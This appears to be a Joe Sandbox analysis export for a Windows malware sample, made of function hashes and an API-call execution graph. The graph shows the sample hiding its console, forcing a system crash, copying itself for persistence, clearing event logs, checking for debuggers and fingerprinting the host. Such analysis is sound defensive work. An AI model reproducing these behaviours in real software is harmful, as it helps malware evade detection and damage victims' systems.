                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: System
                                        • API String ID: 1934640635-3470857405
                                        • Opcode ID: 8e9c648aaf9993d6eed02413e51bf5f09641b046bbebabcfcb4fae47b2ed004d
                                        • Instruction ID: 3ba5d62c3679457129793b7be3033e48e1c477d8e623c434c39b72e7dffc4012
                                        • Opcode Fuzzy Hash: 8e9c648aaf9993d6eed02413e51bf5f09641b046bbebabcfcb4fae47b2ed004d
                                        • Instruction Fuzzy Hash: 3B41C333629B8296EA149B12E94116AB7A4FB587C0F544336DE8DC3B95DF7CD492C310
                                        Function 00007FF670FCCB90 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                        Download Yara Rule
                                        APIs
                                        • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF670FCCCE8
                                          • Part of subcall function 00007FF670FCD9F0: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,7FFFFFFFFFFFFFFF,00007FF670FC3975), ref: 00007FF670FCDA0A
                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF670FCCCE1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturnmalloc
                                        • String ID: Security
                                        • API String ID: 1934640635-1022211991
                                        • Opcode ID: 940fbb8c13e06505b1f8ccc2fbea7ba20c18ea880b94d17af8005ee8a0573366
                                        • Instruction ID: dcca19d778d29906b0087520d06923e81677acd40aae73c2594b084e847a761b
                                        • Opcode Fuzzy Hash: 940fbb8c13e06505b1f8ccc2fbea7ba20c18ea880b94d17af8005ee8a0573366
                                        • Instruction Fuzzy Hash: F0319C23B286C5A5EA14CF2994023BA7650EB45BA4F495631CE2DD77C5DF3CE482C350
                                        Function 00007FF670FC9CFF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2034708173.00007FF670FC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF670FC0000, based on PE: true
                                        • Associated: 00000000.00000002.2034636782.00007FF670FC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034744206.00007FF670FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034762816.00007FF670FD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2034780636.00007FF670FD8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_7ff670fc0000_Jx6bD8nM4qW9sL3v.jbxd
                                        Similarity
                                        • API ID: _dsignmemset
                                        • String ID: 0$null
                                        • API String ID: 210716287-2239106201
                                        • Opcode ID: 449d20cf74046f8510eab42154efe2d25a62bb869c27897a45daba319c9707b5
                                        • Instruction ID: 296cb03a4a14df5eb5001cda9c4e8ff84260df6374a70543bfa64d8a7ddfc96c
                                        • Opcode Fuzzy Hash: 449d20cf74046f8510eab42154efe2d25a62bb869c27897a45daba319c9707b5
                                        • Instruction Fuzzy Hash: AB318D2362CAC595D6618F29E0413EAB360FF84B84F449222EF8D93755EF3CE585C710

                                        Execution Graph

                                        Execution Coverage:22.2%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:0%
                                        Total number of Nodes:1692
                                        Total number of Limit Nodes:17
                                        execution_graph 6177 7ff65e1ff864 ??1_Lockit@std@@QEAA 5944 7ff65e1fcf60 5945 7ff65e1fcf87 5944->5945 5946 7ff65e1fcf76 5944->5946 5946->5945 5947 7ff65e1f7080 20 API calls 5946->5947 5947->5946 6078 7ff65e1fa1e0 6081 7ff65e1f92a0 __std_exception_copy __std_exception_copy 6078->6081 6080 7ff65e1fa1ee 6081->6080 6354 7ff65e1fd8e0 6355 7ff65e1fd8fc 6354->6355 6356 7ff65e1fd912 LocalFree 6355->6356 6357 7ff65e1fd91e 6355->6357 6356->6357 6358 7ff65e1feae0 6359 7ff65e1feaf3 6358->6359 6360 7ff65e1feb00 6358->6360 6361 7ff65e1f29a0 std::exception_ptr::_Current_exception 2 API calls 6359->6361 6361->6360 6178 7ff65e1f9a5f 6179 7ff65e1f9a72 6178->6179 6181 7ff65e1f9ab1 6178->6181 6179->6181 6182 7ff65e1fa140 6179->6182 6183 7ff65e1fa164 6182->6183 6184 7ff65e1fa14d 6182->6184 6185 7ff65e1fa17e memset 6183->6185 6186 7ff65e1fa1b7 6183->6186 6184->6181 6185->6181 6188 7ff65e1f3710 10 API calls 6186->6188 6189 7ff65e1fa1c7 6188->6189 6189->6181 6362 7ff65e1facda 6363 7ff65e1fd9f0 4 API calls 6362->6363 6364 7ff65e1facec 6363->6364 6365 7ff65e1f2a40 13 API calls 6364->6365 6366 7ff65e1fad06 6365->6366 6367 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 6366->6367 6368 7ff65e1fadc8 6367->6368 5951 7ff65e1f5570 5952 7ff65e1f55a0 5951->5952 5952->5952 5953 7ff65e1fc990 8 API calls 5952->5953 5954 7ff65e1f55da 5953->5954 5955 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5954->5955 5956 7ff65e1f55ea 5955->5956 6190 7ff65e1f2670 6191 7ff65e1f269d 6190->6191 6193 7ff65e1f2698 6190->6193 6192 7ff65e1f2757 6194 7ff65e1fd9f0 4 API calls 6192->6194 6193->6191 6193->6192 6196 7ff65e1f2719 6193->6196 6198 7ff65e1f2726 6193->6198 6200 7ff65e1f270b 6193->6200 6194->6200 6195 7ff65e1f2770 memmove 6205 7ff65e1f27ab 6195->6205 6197 7ff65e1f2863 6196->6197 6196->6198 6201 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 6197->6201 6198->6191 6199 7ff65e1fd9f0 4 API calls 6198->6199 6199->6200 6200->6195 6202 7ff65e1f283e _invalid_parameter_noinfo_noreturn 6200->6202 6203 7ff65e1f2868 6201->6203 6202->6191 6204 7ff65e1f2810 6206 7ff65e1fda34 _Receive_impl free 6204->6206 6205->6191 6205->6202 6205->6204 6206->6191 5957 7ff65e1f9370 5958 7ff65e1f93b6 5957->5958 5959 7ff65e1f9386 5957->5959 5960 7ff65e1f93ae 5959->5960 5961 7ff65e1f9418 _invalid_parameter_noinfo_noreturn 5959->5961 5962 7ff65e1fda34 _Receive_impl free 5960->5962 5962->5958 5963 7ff65e1ff970 5964 7ff65e1ff983 5963->5964 5965 7ff65e1ff990 5963->5965 5967 7ff65e1f29a0 5964->5967 5968 7ff65e1f29b3 5967->5968 5969 7ff65e1f29df 5967->5969 5970 7ff65e1f29d7 5968->5970 5971 7ff65e1f29f8 _invalid_parameter_noinfo_noreturn 5968->5971 5969->5965 5972 7ff65e1fda34 _Receive_impl free 5970->5972 5972->5969 6082 7ff65e1fc5f0 6083 7ff65e1f9ea0 6082->6083 6084 7ff65e1fc5fc 6082->6084 6085 7ff65e1f83e0 23 API calls 6083->6085 6086 7ff65e1f9ed8 6083->6086 6091 7ff65e1f9f33 6083->6091 6085->6083 6087 7ff65e1f9f28 6086->6087 6088 7ff65e1f9f4b _invalid_parameter_noinfo_noreturn 6086->6088 6089 7ff65e1fda34 _Receive_impl free 6087->6089 6090 7ff65e1fa640 20 API calls 6088->6090 6089->6091 6092 7ff65e1f9f70 6090->6092 6093 7ff65e1ff9f0 6094 7ff65e1ffa25 __current_exception __current_exception_context terminate 6093->6094 6095 7ff65e1ffa19 6093->6095 6094->6095 5973 7ff65e1fab6f 5974 7ff65e1fd9f0 4 API calls 5973->5974 5975 7ff65e1fab81 5974->5975 5976 7ff65e1fd9f0 4 API calls 5975->5976 5977 7ff65e1fabab 5976->5977 5982 7ff65e1fd6a0 5977->5982 5979 7ff65e1fabd1 5979->5979 5980 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5979->5980 5981 7ff65e1fadc8 5980->5981 5983 7ff65e1fd761 5982->5983 5984 7ff65e1fd6cc 5982->5984 5983->5979 5985 7ff65e1fd9f0 4 API calls 5984->5985 5986 7ff65e1fd6e4 5985->5986 5987 7ff65e1f2a40 13 API calls 5986->5987 5988 7ff65e1fd701 5987->5988 5989 7ff65e1fab10 8 API calls 5988->5989 5990 7ff65e1fd70f 5989->5990 5991 7ff65e1fd6a0 21 API calls 5990->5991 5991->5983 5914 7ff65e1f3fea LoadLibraryA 5915 7ff65e1f4020 5914->5915 5916 7ff65e1f3fff GetProcAddress 5914->5916 5919 7ff65e1f4530 9 API calls 5915->5919 5921 7ff65e1f3eb0 5915->5921 5917 7ff65e1f402f GetCurrentProcess NtQueryInformationProcess FreeLibrary 5916->5917 5918 7ff65e1f4017 FreeLibrary 5916->5918 5917->5915 5918->5915 5920 7ff65e1f427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5919->5920 5920->5921 5922 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5921->5922 5923 7ff65e1f423d 5922->5923 6211 7ff65e1f9469 6212 7ff65e1f947a 6211->6212 6213 7ff65e1f948f 6211->6213 6213->6212 6214 7ff65e1fa140 11 API calls 6213->6214 6214->6212 6099 7ff65e1f9fe6 6100 7ff65e1fbc80 16 API calls 6099->6100 6101 7ff65e1f9feb 6100->6101 5996 7ff65e1fad45 5997 7ff65e1fd9f0 4 API calls 5996->5997 5998 7ff65e1fad57 5997->5998 5999 7ff65e1fada4 5998->5999 6000 7ff65e1fc8d0 7 API calls 5998->6000 6002 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5999->6002 6001 7ff65e1fad84 memmove 6000->6001 6001->5999 6003 7ff65e1fadc8 6002->6003 6004 7ff65e1fb341 6005 7ff65e1fb346 ?uncaught_exceptions@std@ 6004->6005 6006 7ff65e1fb350 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 6005->6006 6007 7ff65e1fb35a 6005->6007 6006->6007 6008 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 6007->6008 6009 7ff65e1fb385 6008->6009 6215 7ff65e1f2c40 6216 7ff65e1f20b0 _Receive_impl 2 API calls 6215->6216 6217 7ff65e1f2c54 6216->6217 6218 7ff65e1f2c66 6217->6218 6219 7ff65e1fda34 _Receive_impl free 6217->6219 6219->6218 6103 7ff65e1f9fc0 6104 7ff65e1fd9f0 4 API calls 6103->6104 6105 7ff65e1f9fca 6104->6105 6106 7ff65e1fd5c0 6107 7ff65e1fd5e1 6106->6107 6108 7ff65e1fd5cf 6106->6108 6109 7ff65e1fc470 20 API calls 6108->6109 6109->6107 6010 7ff65e1fdb38 6011 7ff65e1fdb48 6010->6011 6023 7ff65e1fde24 6011->6023 6013 7ff65e1fe324 9 API calls 6014 7ff65e1fdbed 6013->6014 6015 7ff65e1fdb6c _RTC_Initialize 6021 7ff65e1fdbcf 6015->6021 6031 7ff65e1fe2c8 InitializeSListHead 6015->6031 6021->6013 6022 7ff65e1fdbdd 6021->6022 6024 7ff65e1fde35 6023->6024 6025 7ff65e1fde67 6023->6025 6026 7ff65e1fdea4 6024->6026 6029 7ff65e1fde3a __scrt_acquire_startup_lock 6024->6029 6025->6015 6027 7ff65e1fe324 9 API calls 6026->6027 6028 7ff65e1fdeae 6027->6028 6029->6025 6030 7ff65e1fde57 _initialize_onexit_table 6029->6030 6030->6025 6032 7ff65e1feb37 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 6110 7ff65e1fe9d4 6111 7ff65e1fea0c __GSHandlerCheckCommon 6110->6111 6112 7ff65e1fea38 6111->6112 6113 7ff65e1fea27 __CxxFrameHandler4 6111->6113 6113->6112 6033 7ff65e1f4750 6034 7ff65e1f4765 6033->6034 6035 7ff65e1f47ac 6033->6035 6034->6035 6036 7ff65e1f477c SysFreeString 6034->6036 6037 7ff65e1f4789 6034->6037 6036->6037 6038 7ff65e1f4797 6037->6038 6040 7ff65e1fda34 _Receive_impl free 6037->6040 6039 7ff65e1fda34 _Receive_impl free 6038->6039 6039->6035 6040->6038 6373 7ff65e1f10d0 __std_exception_destroy 6114 7ff65e1febd0 6115 7ff65e1fda34 _Receive_impl free 6114->6115 6116 7ff65e1febe7 6115->6116 6224 7ff65e1ffa4f _seh_filter_exe 6117 7ff65e1f97cd 6118 7ff65e1f97f8 6117->6118 6123 7ff65e1f97e3 6117->6123 6119 7ff65e1f9893 6118->6119 6120 7ff65e1f9870 memset 6118->6120 6118->6123 6122 7ff65e1f3710 10 API calls 6119->6122 6120->6123 6122->6123 6041 7ff65e1fdd4a 6042 7ff65e1fe474 GetModuleHandleW 6041->6042 6043 7ff65e1fdd51 6042->6043 6044 7ff65e1fdd55 6043->6044 6045 7ff65e1fdd90 _exit 6043->6045 6225 7ff65e1fac49 6226 7ff65e1fd9f0 4 API calls 6225->6226 6227 7ff65e1fac5b 6226->6227 6228 7ff65e1fd610 6 API calls 6227->6228 6229 7ff65e1facd1 6227->6229 6230 7ff65e1fac8f 6228->6230 6231 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 6229->6231 6230->6229 6232 7ff65e1fab10 8 API calls 6230->6232 6233 7ff65e1fadc8 6231->6233 6232->6230 5931 7ff65e1f3ec9 CreateToolhelp32Snapshot 5932 7ff65e1f3f06 memset Process32FirstW 5931->5932 5933 7ff65e1f3ef7 5931->5933 5934 7ff65e1f3f74 CloseHandle 5932->5934 5935 7ff65e1f3f32 5932->5935 5938 7ff65e1f4530 9 API calls 5933->5938 5941 7ff65e1f3eb0 5933->5941 5934->5933 5936 7ff65e1f3f40 _wcsicmp 5935->5936 5940 7ff65e1f3f5e Process32NextW 5935->5940 5936->5935 5937 7ff65e1f3f6f 5936->5937 5937->5934 5939 7ff65e1f427e ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 5938->5939 5939->5941 5940->5935 5940->5937 5942 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5941->5942 5943 7ff65e1f423d 5942->5943 6124 7ff65e1f1020 __std_exception_copy 6049 7ff65e1fcfa0 6050 7ff65e1fcfc7 6049->6050 6051 7ff65e1fcfb6 6049->6051 6051->6050 6052 7ff65e1f83e0 23 API calls 6051->6052 6052->6051 6125 7ff65e1fc220 6126 7ff65e1fc279 6125->6126 6129 7ff65e1fc27e 6125->6129 6127 7ff65e1fb6a0 9 API calls 6126->6127 6127->6129 6128 7ff65e1f3200 13 API calls 6130 7ff65e1fc297 6128->6130 6129->6128 6131 7ff65e1f3200 13 API calls 6130->6131 6132 7ff65e1fc2b0 6131->6132 6133 7ff65e1f3200 13 API calls 6132->6133 6134 7ff65e1fc2c5 6133->6134 6135 7ff65e1f3200 13 API calls 6134->6135 6136 7ff65e1fc2de 6135->6136 6238 7ff65e1f8e9d 6239 7ff65e1f8e62 6238->6239 6240 7ff65e1f9056 6239->6240 6242 7ff65e1f9138 6239->6242 6243 7ff65e1f8eff 6239->6243 6241 7ff65e1fd9f0 4 API calls 6240->6241 6244 7ff65e1f906c 6241->6244 6245 7ff65e1fb3b0 16 API calls 6242->6245 6246 7ff65e1fbc00 12 API calls 6243->6246 6248 7ff65e1fd610 6 API calls 6244->6248 6250 7ff65e1f9051 6244->6250 6247 7ff65e1f9150 6245->6247 6273 7ff65e1f8f09 6246->6273 6249 7ff65e1fbff0 39 API calls 6247->6249 6251 7ff65e1f90b1 6248->6251 6252 7ff65e1f915d _CxxThrowException 6249->6252 6253 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 6250->6253 6251->6250 6260 7ff65e1fab10 8 API calls 6251->6260 6255 7ff65e1f91b1 6252->6255 6256 7ff65e1f91de 6252->6256 6254 7ff65e1f9118 6253->6254 6257 7ff65e1f91d6 6255->6257 6261 7ff65e1f91f1 _invalid_parameter_noinfo_noreturn 6255->6261 6262 7ff65e1fda34 _Receive_impl free 6257->6262 6258 7ff65e1fab10 8 API calls 6258->6273 6259 7ff65e1fd320 memcmp 6259->6273 6260->6251 6263 7ff65e1f7080 20 API calls 6261->6263 6262->6256 6264 7ff65e1f9212 6263->6264 6266 7ff65e1f9248 6264->6266 6269 7ff65e1f9240 6264->6269 6271 7ff65e1f9261 _invalid_parameter_noinfo_noreturn 6264->6271 6265 7ff65e1fd540 memcmp 6265->6273 6267 7ff65e1f9133 6268 7ff65e1f5680 ?_Xlength_error@std@@YAXPEBD 6267->6268 6268->6242 6272 7ff65e1fda34 _Receive_impl free 6269->6272 6270 7ff65e1fd9f0 4 API calls 6270->6273 6277 7ff65e1f92a0 __std_exception_copy __std_exception_copy 6271->6277 6272->6266 6273->6250 6273->6258 6273->6259 6273->6265 6273->6267 6273->6270 6275 7ff65e1fa640 20 API calls 6273->6275 6275->6273 6276 7ff65e1f927e 6277->6276 4500 7ff65e1fdc1c 4501 7ff65e1fdc35 4500->4501 4502 7ff65e1fdd73 4501->4502 4503 7ff65e1fdc3d __scrt_acquire_startup_lock 4501->4503 4547 7ff65e1fe324 IsProcessorFeaturePresent 4502->4547 4505 7ff65e1fdd7d 4503->4505 4510 7ff65e1fdc5b __scrt_release_startup_lock 4503->4510 4506 7ff65e1fe324 9 API calls 4505->4506 4507 7ff65e1fdd88 4506->4507 4509 7ff65e1fdd90 _exit 4507->4509 4508 7ff65e1fdc80 4510->4508 4511 7ff65e1fdd06 _get_initial_narrow_environment __p___argv __p___argc 4510->4511 4514 7ff65e1fdcfe _register_thread_local_exe_atexit_callback 4510->4514 4520 7ff65e1f42b0 4511->4520 4514->4511 4517 7ff65e1fdd33 4518 7ff65e1fdd38 _cexit 4517->4518 4519 7ff65e1fdd3d 4517->4519 4518->4519 4519->4508 4553 7ff65e1f3e00 4520->4553 4523 7ff65e1f4320 GetConsoleWindow ShowWindow SetConsoleCtrlHandler 4525 7ff65e1f44de 4523->4525 4526 7ff65e1f4346 GetConsoleWindow GetSystemMenu 4523->4526 4524 7ff65e1f42e6 RtlAdjustPrivilege NtRaiseHardError 4524->4523 4527 7ff65e1f4530 9 API calls 4525->4527 4528 7ff65e1f435c RemoveMenu 4526->4528 4529 7ff65e1f436d GetModuleFileNameW GetFileAttributesW SetFileAttributesW 4526->4529 4530 7ff65e1f44f1 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@P6AAEAV01@AEAV01@@Z 4527->4530 4528->4529 4531 7ff65e1f44d5 4529->4531 4542 7ff65e1f43b1 4529->4542 4530->4531 4532 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4531->4532 4534 7ff65e1f4513 4532->4534 4533 7ff65e1f43d0 GdiplusStartup 4557 7ff65e1f47d0 GetModuleFileNameW SHGetKnownFolderPath 4533->4557 4545 7ff65e1fe474 GetModuleHandleW 4534->4545 4536 7ff65e1f43ff 4577 7ff65e1f4990 6 API calls 4536->4577 4640 7ff65e1f7e10 4536->4640 4540 7ff65e1f4442 OpenEventLogW 4541 7ff65e1f4455 ClearEventLogW CloseEventLog 4540->4541 4540->4542 4541->4542 4542->4531 4542->4533 4542->4540 4543 7ff65e1f44d7 _invalid_parameter_noinfo_noreturn 4542->4543 4711 7ff65e1fda34 4542->4711 4543->4525 4546 7ff65e1fdd2f 4545->4546 4546->4507 4546->4517 4548 7ff65e1fe34a 4547->4548 4549 7ff65e1fe358 memset RtlCaptureContext RtlLookupFunctionEntry 4548->4549 4550 7ff65e1fe392 RtlVirtualUnwind 4549->4550 4551 7ff65e1fe3ce memset IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 4549->4551 4550->4551 4552 7ff65e1fe44e 4551->4552 4552->4505 4554 7ff65e1f3eb0 4553->4554 4555 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4554->4555 4556 7ff65e1f423d 4555->4556 4556->4523 4556->4524 4714 7ff65e1f5210 4557->4714 4560 7ff65e1f4890 4733 7ff65e1f5350 4560->4733 4562 7ff65e1f485f memmove 4564 7ff65e1f48a6 4562->4564 4565 7ff65e1f491a CoTaskMemFree 4564->4565 4566 7ff65e1f4915 4564->4566 4569 7ff65e1f490e _invalid_parameter_noinfo_noreturn 4564->4569 4567 7ff65e1f4932 GetFileAttributesW 4565->4567 4568 7ff65e1f492f 4565->4568 4570 7ff65e1fda34 _Receive_impl free 4566->4570 4571 7ff65e1f493d 4567->4571 4572 7ff65e1f4958 4567->4572 4568->4567 4569->4566 4570->4565 4573 7ff65e1f494a CopyFileW 4571->4573 4574 7ff65e1f4947 4571->4574 4575 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4572->4575 4573->4572 4574->4573 4576 7ff65e1f496b 4575->4576 4576->4536 4578 7ff65e1f4ad7 VariantClear VariantClear VariantClear VariantClear 4577->4578 4579 7ff65e1fd9f0 4 API calls 4578->4579 4580 7ff65e1f4b1c 4579->4580 4581 7ff65e1f4b29 SysAllocString 4580->4581 4582 7ff65e1f4b59 4580->4582 4581->4582 4583 7ff65e1f51a9 4581->4583 4582->4583 4584 7ff65e1f4bbb 4582->4584 4585 7ff65e1f4b93 SysFreeString 4582->4585 4586 7ff65e1f4b9c 4582->4586 4587 7ff65e1fd9f0 4 API calls 4584->4587 4585->4586 4588 7ff65e1f4baa 4586->4588 4590 7ff65e1fda34 _Receive_impl free 4586->4590 4589 7ff65e1f4bd7 4587->4589 4591 7ff65e1fda34 _Receive_impl free 4588->4591 4592 7ff65e1f4be4 SysAllocString 4589->4592 4593 7ff65e1f4c14 4589->4593 4590->4588 4591->4584 4592->4583 4592->4593 4593->4583 4594 7ff65e1f4c77 4593->4594 4595 7ff65e1f4c4f SysFreeString 4593->4595 4596 7ff65e1f4c58 4593->4596 4597 7ff65e1f4cd6 4594->4597 4599 7ff65e1f4c88 CoUninitialize 4594->4599 4595->4596 4598 7ff65e1f4c66 4596->4598 4600 7ff65e1fda34 _Receive_impl free 4596->4600 4602 7ff65e1fd9f0 4 API calls 4597->4602 4601 7ff65e1fda34 _Receive_impl free 4598->4601 4606 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4599->4606 4600->4598 4601->4594 4603 7ff65e1f4d11 4602->4603 4605 7ff65e1f4d1e SysAllocString 4603->4605 4608 7ff65e1f4d4e 4603->4608 4605->4583 4605->4608 4607 7ff65e1f4cb9 4606->4607 4607->4536 4608->4583 4609 7ff65e1f4d80 SysFreeString 4608->4609 4610 7ff65e1f4d89 4608->4610 4614 7ff65e1f4da8 4608->4614 4609->4610 4611 7ff65e1f4d97 4610->4611 4612 7ff65e1fda34 _Receive_impl free 4610->4612 4613 7ff65e1fda34 _Receive_impl free 4611->4613 4612->4611 4613->4614 4615 7ff65e1fd9f0 4 API calls 4614->4615 4616 7ff65e1f4ef5 4615->4616 4617 7ff65e1f4f02 SysAllocString 4616->4617 4619 7ff65e1f4f2a 4616->4619 4617->4619 4618 7ff65e1f4f90 SysAllocString 4618->4583 4626 7ff65e1f4fe2 VariantInit VariantInit 4618->4626 4619->4583 4619->4618 4620 7ff65e1f4f71 4619->4620 4621 7ff65e1f4f68 SysFreeString 4619->4621 4622 7ff65e1f4f7f 4620->4622 4623 7ff65e1fda34 _Receive_impl free 4620->4623 4621->4620 4624 7ff65e1fda34 _Receive_impl free 4622->4624 4623->4622 4624->4618 4627 7ff65e1fd9f0 4 API calls 4626->4627 4628 7ff65e1f5040 4627->4628 4629 7ff65e1f504c SysAllocString 4628->4629 4630 7ff65e1f507c 4628->4630 4629->4583 4629->4630 4630->4583 4631 7ff65e1f5148 VariantClear VariantClear VariantClear 4630->4631 4632 7ff65e1f511f SysFreeString 4630->4632 4633 7ff65e1f5128 4630->4633 4634 7ff65e1f5175 CoUninitialize 4631->4634 4632->4633 4635 7ff65e1f5136 4633->4635 4637 7ff65e1fda34 _Receive_impl free 4633->4637 4634->4583 4636 7ff65e1fda34 _Receive_impl free 4635->4636 4638 7ff65e1f5147 4636->4638 4637->4635 4638->4631 4641 7ff65e1f7e28 4640->4641 4642 7ff65e1f83b8 4641->4642 4772 7ff65e1f34a0 4641->4772 4644 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4642->4644 4646 7ff65e1f4417 CoUninitialize 4644->4646 4645 7ff65e1f7e84 GetUserNameW 4789 7ff65e1f21a0 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 4645->4789 4646->4542 4653 7ff65e1f34a0 8 API calls 4654 7ff65e1f7f15 GetComputerNameW 4653->4654 4655 7ff65e1f21a0 10 API calls 4654->4655 4656 7ff65e1f7f40 4655->4656 4657 7ff65e1f2cc0 42 API calls 4656->4657 4658 7ff65e1f7f70 4657->4658 4659 7ff65e1f20b0 _Receive_impl 2 API calls 4658->4659 4660 7ff65e1f7f7d 4659->4660 4661 7ff65e1f34a0 8 API calls 4660->4661 4662 7ff65e1f7fa6 4661->4662 4833 7ff65e1f1450 4662->4833 4665 7ff65e1f34a0 8 API calls 4666 7ff65e1f7fd9 GetVolumeInformationW 4665->4666 4667 7ff65e1f808e 4666->4667 4668 7ff65e1f8029 4666->4668 4669 7ff65e1f808c 4667->4669 4670 7ff65e1f34a0 8 API calls 4667->4670 5097 7ff65e1f3280 4668->5097 4672 7ff65e1f34a0 8 API calls 4669->4672 4670->4669 4674 7ff65e1f80dc memset GetVersionExW 4672->4674 4673 7ff65e1f8043 4675 7ff65e1f21a0 10 API calls 4673->4675 4676 7ff65e1f8113 GetModuleHandleW GetProcAddress 4674->4676 4677 7ff65e1f810c 4674->4677 4678 7ff65e1f804f 4675->4678 4679 7ff65e1f8135 4676->4679 4680 7ff65e1f8139 4676->4680 4681 7ff65e1f8195 4677->4681 4682 7ff65e1f81e3 4677->4682 4683 7ff65e1f2cc0 42 API calls 4678->4683 4679->4677 5100 7ff65e1f1390 4680->5100 4686 7ff65e1f21a0 10 API calls 4681->4686 4684 7ff65e1f81e1 4682->4684 4685 7ff65e1f34a0 8 API calls 4682->4685 4687 7ff65e1f807f 4683->4687 4689 7ff65e1f34a0 8 API calls 4684->4689 4685->4684 4690 7ff65e1f81a1 4686->4690 4688 7ff65e1f20b0 _Receive_impl 2 API calls 4687->4688 4688->4669 4692 7ff65e1f8249 4689->4692 4694 7ff65e1f2cc0 42 API calls 4690->4694 4859 7ff65e1f1780 4692->4859 4696 7ff65e1f81d4 4694->4696 4698 7ff65e1f20b0 _Receive_impl 2 API calls 4696->4698 4698->4684 4699 7ff65e1f828f 4700 7ff65e1f34a0 8 API calls 4699->4700 4701 7ff65e1f82da 4700->4701 4905 7ff65e1f70a0 4701->4905 4703 7ff65e1f8342 4704 7ff65e1f8395 4703->4704 4705 7ff65e1f8390 4703->4705 4708 7ff65e1f8389 _invalid_parameter_noinfo_noreturn 4703->4708 5104 7ff65e1f9ea0 4704->5104 4710 7ff65e1fda34 _Receive_impl free 4705->4710 4707 7ff65e1f82ed 4707->4703 4707->4708 4709 7ff65e1fda34 _Receive_impl free 4707->4709 4708->4705 4709->4703 4710->4704 4712 7ff65e1fe935 free 4711->4712 4713 7ff65e1fda2c 4711->4713 4713->4712 4715 7ff65e1f5240 4714->4715 4715->4715 4716 7ff65e1f5344 4715->4716 4717 7ff65e1f525d 4715->4717 4763 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 4716->4763 4719 7ff65e1f5268 memmove 4717->4719 4722 7ff65e1f5289 4717->4722 4721 7ff65e1f4848 4719->4721 4720 7ff65e1f5349 4764 7ff65e1f1120 4720->4764 4721->4560 4721->4562 4722->4720 4723 7ff65e1f5307 4722->4723 4725 7ff65e1f52c6 memmove 4722->4725 4726 7ff65e1f52b9 4722->4726 4729 7ff65e1fd9f0 4 API calls 4723->4729 4725->4721 4753 7ff65e1fd9f0 4726->4753 4727 7ff65e1f534f 4729->4725 4732 7ff65e1f5300 _invalid_parameter_noinfo_noreturn 4732->4723 4734 7ff65e1f5504 4733->4734 4736 7ff65e1f5383 4733->4736 4771 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 4734->4771 4737 7ff65e1f5509 4736->4737 4738 7ff65e1f5405 4736->4738 4739 7ff65e1f5431 4736->4739 4745 7ff65e1f53e9 4736->4745 4741 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 4737->4741 4738->4737 4740 7ff65e1f5412 4738->4740 4742 7ff65e1fd9f0 4 API calls 4739->4742 4743 7ff65e1fd9f0 4 API calls 4740->4743 4744 7ff65e1f550f 4741->4744 4742->4745 4743->4745 4746 7ff65e1f5462 memmove memmove 4745->4746 4747 7ff65e1f54bf memmove memmove 4745->4747 4749 7ff65e1f54b8 _invalid_parameter_noinfo_noreturn 4745->4749 4750 7ff65e1f54ab 4746->4750 4751 7ff65e1f5496 4746->4751 4748 7ff65e1f54b6 4747->4748 4748->4564 4749->4747 4752 7ff65e1fda34 _Receive_impl free 